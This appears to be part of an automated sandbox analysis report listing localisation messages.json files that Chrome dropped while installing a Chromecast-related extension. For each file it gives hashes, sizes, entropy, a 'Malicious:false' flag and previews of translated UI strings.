                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Zatrzymuje si.".. },.. "1213957982723875920": {.. "message": "Kt.ra z tych opcji najlepiej opisuje Twoj. sie.?".. },.. "128276876460319075": {.. "message": "Wykrywanie urz.dze.".. },.. "1428448869078126731": {.. "message": "P.ynno.. obrazu".. },.. "1522140683318860351": {.. "message": "Nie uda.o si. nawi.za. po..czenia. Spr.buj ponownie.".. },.. "1550904064710828958": {.. "message": "P.ynna".. },.. "1636686747687494376": {.. "message": "Idealna".. },.. "1802762746589457177": {.. "message": "G.o.no..".. },.. "1850397500312020388": {.. "message": "Czy Chromecasta wida. w.$START_LINK$aplikacji Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\pt\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15475
                                                                                                                                                                Entropy (8bit):5.239856689212255
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:L9PpriI0RYHf8kfrvvI/99T+BEsV6c8TEKdl:LrkYPfrgsV6uml
                                                                                                                                                                MD5:FABD5D64267F0E6D7BE6983AB8704F8C
                                                                                                                                                                SHA1:D4DAAD0FF5C461C51E6C1FD22B86AFC5B13E123F
                                                                                                                                                                SHA-256:D82DCA262FF005668B252B478DEDAAC4A5C1E417AF9DE57C22F169A6680183AE
                                                                                                                                                                SHA-512:AD8B2129DCB4F232AEDD7A2B90AF2EFA43497F9118C27AB843D279F7B0EDF70AF95251B46C8098AA831FEC0B2AF6AB0308D3DCFD9AE87BEA8AD9E0D1032E0F8B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Congela".. },.. "1213957982723875920": {.. "message": "Qual das seguintes alternativas melhor descreve sua rede?".. },.. "128276876460319075": {.. "message": "Detec..o de dispositivos".. },.. "1428448869078126731": {.. "message": "Suavidade da reprodu..o do v.deo".. },.. "1522140683318860351": {.. "message": "Falha na conex.o. Tente novamente.".. },.. "1550904064710828958": {.. "message": "Suave".. },.. "1636686747687494376": {.. "message": "Perfeita".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": ". poss.vel encontrar seu Chromecast no $START_LINK$app Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ro\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15655
                                                                                                                                                                Entropy (8bit):5.288239072087021
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:rpzpr34BALdvonekYFJr2RlYh7YU95cep3AnjYCV6c8TEKdl:HrIqLdv0VYFJrT95c8VCV6uml
                                                                                                                                                                MD5:75E16A8FB75A9A168CFF86388F190C99
                                                                                                                                                                SHA1:C27CE4C1DB3DF2D232925C73DC9AC1FA24DAD396
                                                                                                                                                                SHA-256:9C4716FF42A730F1E7725F0D9E703F311E79FDA31F85B4BB0B8863FC3C27AB9D
                                                                                                                                                                SHA-512:9E0BF56560B1D73F9706FF6AA2D5628CBE58EFCE197899A7EE686B2395D0FA2F9927538DD9B7B152CE2DED4708A210DA3DD6F5350E62AF853E809782997B1922
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Redare cu bloc.ri".. },.. "1213957982723875920": {.. "message": "Care dintre urm.toarele descrie cel mai bine re.eaua ta?".. },.. "128276876460319075": {.. "message": "Descoperirea dispozitivelor".. },.. "1428448869078126731": {.. "message": "Calitatea red.rii videoclipului".. },.. "1522140683318860351": {.. "message": "Conexiunea nu s-a stabilit. .ncerca.i din nou.".. },.. "1550904064710828958": {.. "message": "Redare lin.".. },.. "1636686747687494376": {.. "message": "Redare perfect.".. },.. "1802762746589457177": {.. "message": "Volum".. },.. "1850397500312020388": {.. "message": "Chromecastul dvs. apare .n $START_LINK$ aplica.ia Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ru\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):17686
                                                                                                                                                                Entropy (8bit):5.471928545648783
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:Pu6PQpr19XtZkmVpFQkeVBSr/7Nq5k8TyIeBcrvV6c8TEKdl:ir7Q+LASrWk8CirvV6uml
                                                                                                                                                                MD5:8EF94823972EA8D2FC9BB7EC09AB1846
                                                                                                                                                                SHA1:4171DC9CE9D82FDA5A280517A1FE58C907D75CE3
                                                                                                                                                                SHA-256:1009DB9FFA64E411B31E0780EBA43B9C9F8B05B5AC8CCA9A38514650261ABB0A
                                                                                                                                                                SHA-512:83CEC6CF43F4A5A998B987DA6B6F236B36078C560F1CD79366AEBF2950ECD881F0B3ECC1C0769D911381B4A1D5901121E3620CA1AC2401BDE12642BE64EFD67A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".........".. },.. "1213957982723875920": {.. "message": "..... .. ......... .... ........ ............. ..... ....?".. },.. "128276876460319075": {.. "message": "........ . ............ .........".. },.. "1428448869078126731": {.. "message": "............... .....".. },.. "1522140683318860351": {.. "message": ".. ....... .......... ........... ......... ........".. },.. "1550904064710828958": {.. "message": "....... ...............".. },.. "1636686747687494376": {.. "message": "........".. },.. "1802762746589457177": {.. "message": ".........".. },.. "1850397500312020388": {.. "message": ".. ...... .... .......... Chromecast . $START_LINK$........
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\sk\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15733
                                                                                                                                                                Entropy (8bit):5.409011445299871
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:PIwprzrAXVZprkF9PMZq6rTxnfKVSk7b9V6c8TEKdl:jrojp4F94q6rRsd9V6uml
                                                                                                                                                                MD5:9FDFFDD627F96DF699EC9F9D3625502F
                                                                                                                                                                SHA1:04B830F3C7DA394EEA6063B7405FA12B23E151CA
                                                                                                                                                                SHA-256:73B21C2BD165AA33724EABF134AF52ADD9A7C202A1462F0BEDEA3BC6701DD470
                                                                                                                                                                SHA-512:9B135A8430244EDD5ABDAB2537029765EA33468627EFC39477AFBC8429907DC307A1E5C06E2178472C7D46AE049B7C1F5112B91019056126451023FD2AD66325
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Zam.za".. },.. "1213957982723875920": {.. "message": "Ktor. z nasleduj.cich skuto.nost. najlep.ie popisuj. va.u sie.?".. },.. "128276876460319075": {.. "message": "Vyh.ad.vanie zariaden.".. },.. "1428448869078126731": {.. "message": "Plynulos. videa".. },.. "1522140683318860351": {.. "message": "Pripojenie zlyhalo. Sk.ste to znova.".. },.. "1550904064710828958": {.. "message": "Plynul.".. },.. "1636686747687494376": {.. "message": "V.born.".. },.. "1802762746589457177": {.. "message": "Hlasitos.".. },.. "1850397500312020388": {.. "message": "Vid.te svoj Chromecast v.$START_LINK$aplik.cii Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\sl\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15628
                                                                                                                                                                Entropy (8bit):5.292871661441512
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:Ppp0prwFOhNkcUw4kjkNOD7r31RdeYqakV6c8TEKdl:0rXjYwy4Xr34AkV6uml
                                                                                                                                                                MD5:F60AB4E9A79FD6F32909AFAC226446B3
                                                                                                                                                                SHA1:07C9E383D4488BEBE316CA86966FC728F55A2E32
                                                                                                                                                                SHA-256:CDE581E6E7CF0136B003B45549E3BBEE7B67B74ADD786A8D5607BFDAD1DE7B87
                                                                                                                                                                SHA-512:F6A7673A8EFDB7FF74D7B83DD4BCB3683031DB7FBFE6654F6311CBA53EC42F3E45CE2B42A6E385F868271BBDD348272ACF9CE304E2DB52A10B36D24C7B03114F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Zamrzne".. },.. "1213957982723875920": {.. "message": "Kaj od tega najbolje opi.e va.e omre.je?".. },.. "128276876460319075": {.. "message": "Odkrivanje naprav".. },.. "1428448869078126731": {.. "message": "Teko.e predvajanje videoposnetka".. },.. "1522140683318860351": {.. "message": "Vzpostavitev povezave ni uspela. Poskusite znova.".. },.. "1550904064710828958": {.. "message": "Teko.e".. },.. "1636686747687494376": {.. "message": "Odli.no".. },.. "1802762746589457177": {.. "message": "Glasnost".. },.. "1850397500312020388": {.. "message": "Ali je Chromecast viden v $START_LINK$aplikaciji Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\sr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):17766
                                                                                                                                                                Entropy (8bit):5.432888569680161
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:AtUpr9riVEviVutkeV74ErXLfWloyWR5RxIj2V6c8TEKdl:AGr1pvtuWDrz9kj2V6uml
                                                                                                                                                                MD5:127A5422BE8B58668A9502DC03C1639C
                                                                                                                                                                SHA1:77603F93079A203D104CFF2806C55330658578FC
                                                                                                                                                                SHA-256:C7B9ECE155924B9FA60662CDC1D1736A210018BD16E4B3E3613A2EE17782F0D6
                                                                                                                                                                SHA-512:2421046C4E921F2181E5B8D4E478332BB74E561E7924D37EB7AB171847EA1D2748C94BB632198F0A78888F6F14EB5F1951B99EFA0AA0DC32A9C8E293CB4C3DC6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "......... ..".. },.. "1213957982723875920": {.. "message": ".... .. ........ ...... ....... ....... .....?".. },.. "128276876460319075": {.. "message": "......... .......".. },.. "1428448869078126731": {.. "message": "........ ............ ..... ......".. },.. "1522140683318860351": {.. "message": ".......... .... ....... ........ .......".. },.. "1550904064710828958": {.. "message": "... .......".. },.. "1636686747687494376": {.. "message": ".......".. },.. "1802762746589457177": {.. "message": "...... .....".. },.. "1850397500312020388": {.. "message": "...... .. .. ...... Chromecast . $START_LINK$.......... Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\sv\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15135
                                                                                                                                                                Entropy (8bit):5.258962752997426
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:LY5pr2y3Lm3kONgMr6nxJNuyF5JTpg2NOV6c8TEKdl:Yr5DMrAfpOV6uml
                                                                                                                                                                MD5:897DAE6B0CF0FDE42648F0B47CB26E06
                                                                                                                                                                SHA1:E1F5F5F65AF34FF9484AB2B01E571EAF19BA23D0
                                                                                                                                                                SHA-256:52656C24F6F6D0F3B3FC01E9504C4D5CEB85624F1B22E974CA675DD0E94EB82D
                                                                                                                                                                SHA-512:399DEACFE61F4AF9B24AAA0357D30149CC49DA7825295933D3AE006714B5DE7AC5FCB9EC5340B0E3AB4ABF25641032BBBB5B7D578CD204F4EDEAFE6E08C55663
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Fastnar tillf.lligt".. },.. "1213957982723875920": {.. "message": "Vilket av f.ljande beskriver ditt n.tverk b.st?".. },.. "128276876460319075": {.. "message": "Enhetsidentifiering".. },.. "1428448869078126731": {.. "message": "J.mn videouppspelning".. },.. "1522140683318860351": {.. "message": "Det gick inte att ansluta. F.rs.k igen.".. },.. "1550904064710828958": {.. "message": "Flyter p.".. },.. "1636686747687494376": {.. "message": "Perfekt".. },.. "1802762746589457177": {.. "message": "Volym".. },.. "1850397500312020388": {.. "message": "Visas din Chromecast i $START_LINK$ Google Home-appen$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\sw\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15156
                                                                                                                                                                Entropy (8bit):5.216902945207334
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:6GprWbq4takN4kbvrwJAV5HeY9NVUpnV6c8TEKdl:nrol7rRkpnV6uml
                                                                                                                                                                MD5:EC233129047C1202D87DC140F7BA266D
                                                                                                                                                                SHA1:537E4C887428081365D028F32C53E3C92F29AAA6
                                                                                                                                                                SHA-256:28EDBC5C4858217811D45CAA215710E452C8926E4DE99F810001AD664D08BE0D
                                                                                                                                                                SHA-512:2E3F9BA1EA9EEF921E76B46B5EF2404B3B77B61F18CF67CC78C23C62202227F678A3DBE9C730E42A310800914DC53F25E8B2FBF461839DE33D3501B0BCB4EC8D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Inasita kucheza".. },.. "1213957982723875920": {.. "message": "Ni gani kati ya zifuatazo inaelezea mtandao wako vizuri?".. },.. "128276876460319075": {.. "message": "Kupata Kifaa".. },.. "1428448869078126731": {.. "message": "Ulaini wa Kutiririsha Video".. },.. "1522140683318860351": {.. "message": "Imeshindwa kuunganisha. Tafadhali jaribu tena.".. },.. "1550904064710828958": {.. "message": "Laini".. },.. "1636686747687494376": {.. "message": "Bora".. },.. "1802762746589457177": {.. "message": "Sauti".. },.. "1850397500312020388": {.. "message": "Je, unaweza kuona Chromecast yako katika $START_LINK$ programu ya Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ta\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20531
                                                                                                                                                                Entropy (8bit):5.2537196877590056
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:I0N4prlczmbWIO0KISBZdMx4kLQ7rgEsZatRoFkJL+KJtjV6c8TEKdl:0r/TUrRVjV6uml
                                                                                                                                                                MD5:C50C5D2EDFC79DBDCBD5A58A027A3231
                                                                                                                                                                SHA1:14314D760A18C39F06CD072CF5843832AFB86689
                                                                                                                                                                SHA-256:EEB0E89D5AD92B80FF08F88533A111DB3416D7C3860C64227D1CC8B7C2B58298
                                                                                                                                                                SHA-512:A241084C44260C239CB8E6736AB7F7D1988142DDA6CAAD9F907FB42970BE56EC8DA6956BFBE97F926C6EFA32B750F1F57815980494BC31D27DF609C04421AD42
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "....... .........".. },.. "1213957982723875920": {.. "message": "................ ... ...... .............. ...... ........ ...........?".. },.. "128276876460319075": {.. "message": "...... .............".. },.. "1428448869078126731": {.. "message": ".......... ..... .....".. },.. "1522140683318860351": {.. "message": "...... ............ ........ .........".. },.. "1550904064710828958": {.. "message": "..... ......".. },.. "1636686747687494376": {.. "message": "........".. },.. "1802762746589457177": {.. "message": "......."
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\te\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20496
                                                                                                                                                                Entropy (8bit):5.301173454436774
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:hcFQcIrxhljbwSb4V6Icdbf1crfrCk0ODzB+pVelGZqsItV6uml:KcNbw4b2reSCb26uml
                                                                                                                                                                MD5:28425862224952A50E881BFA19475ECC
                                                                                                                                                                SHA1:BDAEC83C2988AFE15D886FE5428FA7870FF1FAF4
                                                                                                                                                                SHA-256:793A422E88496566E3EF1E22F30784268716613EBB56C58DC5C0F4B5344F87BF
                                                                                                                                                                SHA-512:16AECF9768E72D3654A6D9CD21EB57693EBCCB15C60B20CE0F722C24627CC64F3BB9BD5951112A1A8933AD65E1ACDD1013D4F1BB433A4170A99B19003FDE929F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "........".. },.. "1213957982723875920": {.. "message": "..... .......... ... .. ........... ....... ........ ............?".. },.. "128276876460319075": {.. "message": "..... ..... ....".. },.. "1428448869078126731": {.. "message": "...... ...... ......".. },.. "1522140683318860351": {.. "message": "........ .......... ...... ..... ..............".. },.. "1550904064710828958": {.. "message": ".......".. },.. "1636686747687494376": {.. "message": "......... ....".. },.. "1802762746589457177": {.. "message": "........".. },.. "185039750031202038
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\th\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):18849
                                                                                                                                                                Entropy (8bit):5.3815746250038305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:GhjwMfr4c/ey18Ym7ZepIfa1hea0KEr2ucpYxcixh8V6uml:GhjwMfccGy18Ym7ZiIfa1hea0KEKucp2
                                                                                                                                                                MD5:9F926FCB8BAEA23453B99EA162CCDEA1
                                                                                                                                                                SHA1:04D1E45591C0435A39DCA00A81E83E68585E8B64
                                                                                                                                                                SHA-256:100463C587F549C964A4EB21EA38EA1B4ADEF11E927FAC8FF884623B77202C02
                                                                                                                                                                SHA-512:F226278DDF2D1995961690895361AB7B5D221C5E36D7767BBA71F36716C27B28210F85DC7DB4D2FC61B048FE2D058EE76EFBF2AD2A9714375149C4D09E18BE2B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "....".. },.. "1213957982723875920": {.. "message": ".............................................".. },.. "128276876460319075": {.. "message": "...............".. },.. "1428448869078126731": {.. "message": "....................".. },.. "1522140683318860351": {.. "message": "................... ...............".. },.. "1550904064710828958": {.. "message": ".......".. },.. "1636686747687494376": {.. "message": "..........".. },.. "1802762746589457177": {.. "message": "..........".. },.. "1850397500312020388": {.. "message": ".......... Chromecast ..... $
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\tr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15542
                                                                                                                                                                Entropy (8bit):5.336342457334077
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:OGNSbprOWklwIc3uk+zwr5a+qF6LtP2nFjYqcV6c8TEKdl:wrfNV9r5avYqcV6uml
                                                                                                                                                                MD5:B0420F071E7C6C2DE11715A0BF026C63
                                                                                                                                                                SHA1:F41CC696786B18805DB8DC9E1E476146C0D6BE90
                                                                                                                                                                SHA-256:309F946F753DF6AF5C255D772EA0D429462152F78ABA4A96A2E369707A2C6B67
                                                                                                                                                                SHA-512:67B42FC962AB70FFF86777E5057047EF4CFFDA4BED040F9D45BB5DB0275C3B5F21B17924AE5C51C71E8B078AB88AE3001C70CDB4E1994D4C8A20DEFC3A1D34FA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Donuyor".. },.. "1213957982723875920": {.. "message": "A..n.z. a.a..dakilerden hangisi en iyi .ekilde tan.mlar?".. },.. "128276876460319075": {.. "message": "Cihaz Bulma".. },.. "1428448869078126731": {.. "message": "Videonun D.zg.n Oynat.lmas.".. },.. "1522140683318860351": {.. "message": "Ba.lant. ba.ar.s.z oldu. L.tfen tekrar deneyin.".. },.. "1550904064710828958": {.. "message": "D.zg.n".. },.. "1636686747687494376": {.. "message": "M.kemmel".. },.. "1802762746589457177": {.. "message": "Ses d.zeyi".. },.. "1850397500312020388": {.. "message": "Chromecast'inizi $START_LINK$Google Home uygulamas.nda$END_LINK$ g.rebiliyor musunuz? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\uk\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):17539
                                                                                                                                                                Entropy (8bit):5.492873573147444
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:vDBprzaoaqEv390hrTr6hlRU62cdV6uml:/BaFNe76GYX6uml
                                                                                                                                                                MD5:FF06E78C06E8DFF4A422EA24F0AB3760
                                                                                                                                                                SHA1:A434D1CE22DE0D2FD1842E94F5815F7B1972D1EE
                                                                                                                                                                SHA-256:E209FDEF12CCEC03B4E0D5B9464F90D527E62C5BC4DD565C680661D7F282AB02
                                                                                                                                                                SHA-512:8EADCC918F51A946A68AAF4D9DD7F3894BE470FD0A0550E4160D609F30C78BD55508B3DF4D62A28C0813D83C5C10F9A7BFE656A4CF519E4CC814FFB07F1E9F3B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".......".. },.. "1213957982723875920": {.. "message": ".. . ............ ..... ........ ...... .... ......?".. },.. "128276876460319075": {.. "message": "......... ........".. },.. "1428448869078126731": {.. "message": "......... ........... .....".. },.. "1522140683318860351": {.. "message": ".. ....... ............. ......... ........".. },.. "1550904064710828958": {.. "message": "...... ...........".. },.. "1636686747687494376": {.. "message": "......".. },.. "1802762746589457177": {.. "message": "........".. },.. "1850397500312020388": {.. "message": ".. ...... .. .... ........ Chromecast . $START_LINK$....... Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeho
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\vi\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16011
                                                                                                                                                                Entropy (8bit):5.466848470908827
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:8xyKyprnBss0cEW5xk0rdBrQBiaiNiw+3KrV6c8TEKdl:8ULrBfyW5C0rHrOiZ5gKrV6uml
                                                                                                                                                                MD5:05A2C5EED47B155AA9EC9BC3DC15D6A5
                                                                                                                                                                SHA1:09E795DC1FDF80B5E96728C8B1C701B8194DCF97
                                                                                                                                                                SHA-256:EE794AD0D6BAD28C783962EA92CA2E7CDA8E374FFDF083711B03149EFB2A7D32
                                                                                                                                                                SHA-512:38A10B8357D6A6BEA1BFCB760F2103D2B271477D71811ACD86761B70D4B6C8BD7A80E157CF658D751F8BB169725EBCC748EA2D90AAECC42708064D49DA969585
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "D.ng h.nh".. },.. "1213957982723875920": {.. "message": "Tr..ng h.p n.o sau ..y m. t. ..ng nh.t m.ng c.a b.n?".. },.. "128276876460319075": {.. "message": "Kh.m ph. thi.t b.".. },.. "1428448869078126731": {.. "message": ".. m..t c.a video".. },.. "1522140683318860351": {.. "message": "K.t n.i kh.ng th.nh c.ng. Vui l.ng th. l.i.".. },.. "1550904064710828958": {.. "message": "M..t m.".. },.. "1636686747687494376": {.. "message": "Ho.n h.o".. },.. "1802762746589457177": {.. "message": ".m l..ng".. },.. "1850397500312020388": {.. "message": "B.n c. th. nh.n th.y Chromecast c.a m.nh trong $START_LINK$.ng d.ng Google Home$END_LINK$ kh.ng? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "conte
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\zh\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):14773
                                                                                                                                                                Entropy (8bit):5.670562029027517
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:hppr6VVD8/LkiQKrTV2U00jT25kNV6c8TEKdl:hr88/YOrTjF2GV6uml
                                                                                                                                                                MD5:D4513639FFC58664556B4607BF8A3F19
                                                                                                                                                                SHA1:65629BC4CBBACA498F4082DD5884C8D3D7DDDC8A
                                                                                                                                                                SHA-256:C6D49997A9B4FF7FE701EC3644B1A523679A27778FB4BD39B7DBCA9F1ACCE595
                                                                                                                                                                SHA-512:16260FAC30D57EBFD577833F45D52FEA446ABE877D0D4015EF47C5C9072B81DDA71ED4E5E7DAFDEBE82B26556A4477EA4BFCDEC227058E381B9812DAB1F4379B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "..".. },.. "1213957982723875920": {.. "message": "..................".. },.. "128276876460319075": {.. "message": "....".. },.. "1428448869078126731": {.. "message": ".....".. },.. "1522140683318860351": {.. "message": ".........".. },.. "1550904064710828958": {.. "message": "..".. },.. "1636686747687494376": {.. "message": "..".. },.. "1802762746589457177": {.. "message": "..".. },.. "1850397500312020388": {.. "message": "... $START_LINK$Google Home ..$END_LINK$...... Chromecast ..$START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "START_SPAN": {.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\zh_TW\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):14981
                                                                                                                                                                Entropy (8bit):5.7019494203747865
                                                                                                                                                                Encrypted:false
